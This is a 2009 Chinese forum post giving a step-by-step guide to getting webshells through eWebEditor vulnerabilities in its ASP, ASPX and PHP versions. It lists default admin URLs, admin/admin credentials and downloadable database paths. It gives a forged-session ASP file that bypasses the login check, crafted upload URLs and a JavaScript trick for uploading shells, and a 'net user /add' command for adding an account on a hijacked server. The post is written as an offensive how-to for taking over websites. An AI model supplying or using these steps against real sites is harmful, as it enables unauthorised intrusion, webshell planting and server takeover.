渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
社区服务
火星文
银行
结婚
道具中心
勋章中心
管理操作原因
基本信息
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
手机版
小说论坛
用户中心
搜索
银行
猴岛论坛
帖子
用户
版块
帖子
高级搜索
免费资源&网盘分享
原神
实物交易发布
动漫剧场
校园青春
跑跑卡丁车
虚拟交易发布
王者荣耀
综合游戏交流
手机数码
关闭
选中
1
篇
全选
猴岛论坛
电脑百科
渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
发帖
回复
倒序阅读
最近浏览的帖子
最近浏览的版块
« 返回列表
新帖
悬赏
任务
交易贴
自动发卡
拍卖
红包
际遇红包
0
个回复
渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
楼层直达
happylove11
ZxID:1328382
关注Ta
注册时间
2007-12-31
最后登录
2012-01-10
发帖
862
在线
162小时
精华
2
DB
24
威望
523
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
qq
等级:
上校
态度决定一切
举报
只看楼主
使用道具
楼主
发表于: 2009-01-16
0
— (shimei) 请你把帖子中和到一起好吗?别这样分开发表帖子。这样俺看着很累啊 (2009-01-17 08:46) —
最近又想从新写blog了,以前总是拿别人的东西贴
今天准备在blog上自己写点东西吧,没什么技术含量,就算一个总结吧
希望对菜鸟们有些帮助,牛人们表要笑我,呵呵
ewebeditor,相信玩黑的小牛和大牛们都已经非常熟悉了,而且运用的也相当的熟练了吧?其实这个本来也不想写了,想想用他拿了那么多站了,不留个纪念还是不好的,:)
首先:来段官方的介绍
eWebEditorTM 是什么? 在线HTML编辑器!
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
如果有兴趣的话去官方了解详情:
http://www.ewebeditor.net/
先说重点吧,这个编辑器按脚本分主要有3个版本,ASP/ASPX/PHP/ 每个版本都可以利用的
ASP版:
这个版本其实个人感觉是影响最大,使用最多的一个了吧,早期很多asp站都用这个,当然现在也是大量的存在的。。。
怎么利用呢?一般用这个的默认后台的URL都是默认的:
www.xxx.com/admin/ewebeditor/login_admin.asp
类似
www.xxx.com/ewebeditor/login_admin.asp
www.xxx.com/admin/eweb/login_admin.asp
www.xxx.com/admin/editor/login_admin.asp
而且账户和密码也基本都是默认的:admin admin
对于找这个路径还有个简单的方法,就是在他站上新闻或者其他板块上找图片,看图片的URL也是可以找到的,不明白的自己试下就知道了
还有如果默认的账户和密码修改了,我们可以下载他的数据库,然后本地破解MD5了
默认数据库:
.../db/ewebeditor.mdb 或者 .../db/ewebeditor.asp
一般下载数据库后打开察看就可以了,然后后台登陆,新加样式。。。上传ASA马。。。
有的站数据库设置了只读属性,这样的站你是无法新加样式的,这样的站你可以看他数据库里的样式设置情况,一般很多时候都是让人给拿过的,而且明显的asa在那里。。。呵呵,这样的话就可以直接构造一个调用这个样式的连接来上传shell
比如发现数据库里有样式 123 他设置的是可以上传asa的话
那么就可以这样调用:
http://www.xxx.com/eWeb/eWebEditor.asp?id=contentCN&style=123
这样就可以直接上传了,然后在点“编辑”就会找到shell的路径了
其实这个漏洞主要是upload.asp的过滤不严造成的,新版的应该都修复了,具体受影响的版本我也没统计过
另外在公布另外一个ewebeditor的漏洞
漏洞文件:Admin_Private.asp
漏洞语句:
<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个mrchen.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问mrchen.asp,再访问后台任何文件,for example:Admin_Default.asp
这个拿shell的方法就简单了,不详细说了,不懂的可以联系我qq:8175229
ASPX版:
受影响文件:eWebEditorNet/upload.aspx
利用方法:添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell,具体大家自己尝试,不明白的联系我,或者留言
PHP版:
由于PHP脚本特殊性(默认权限高),这个就不公布太多了
当然简单的,默认后台,默认账户密码:admin admin 还是可以用的
单单这一个不算漏洞的漏洞也能直接拿下很多服务器了,呵呵,很多直接系统权限
shell里直接 net user xxx xxx /add 都是可以的。。。。
好了现在凌晨2点半了,也困了,想起这些就写这些吧,以后有想写的在补充,也希望看过的朋友们,牛人们多多指点,多多补充,呵呵,没什么技术含量!
注意:看完此文的朋友千万别找我问我怎么找这些漏洞的Server,这个我不会回答你的,如果是技术上的问题,我会把我知道的告诉你,另外本文没什么技术含量,如果非要转载的话希望留个版权,谢谢
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
打赏
收藏
新鲜事
相关主题
帮助网站站长解决最近流行的com/css/c.js注入问题!
在PPT中快速批量插入图片的方法
用Word快速制作表格的几个小技巧
想学习抓鸡扫描,免杀,汇编,拿站的朋友来...(免费)
第一课拿论坛的号和密码请求加精+++++
WinXP/2000操作系统自动关机的实现
回复
引用
鲜花[
0
]
鸡蛋[
0
]
« 返回列表
发帖
回复
关闭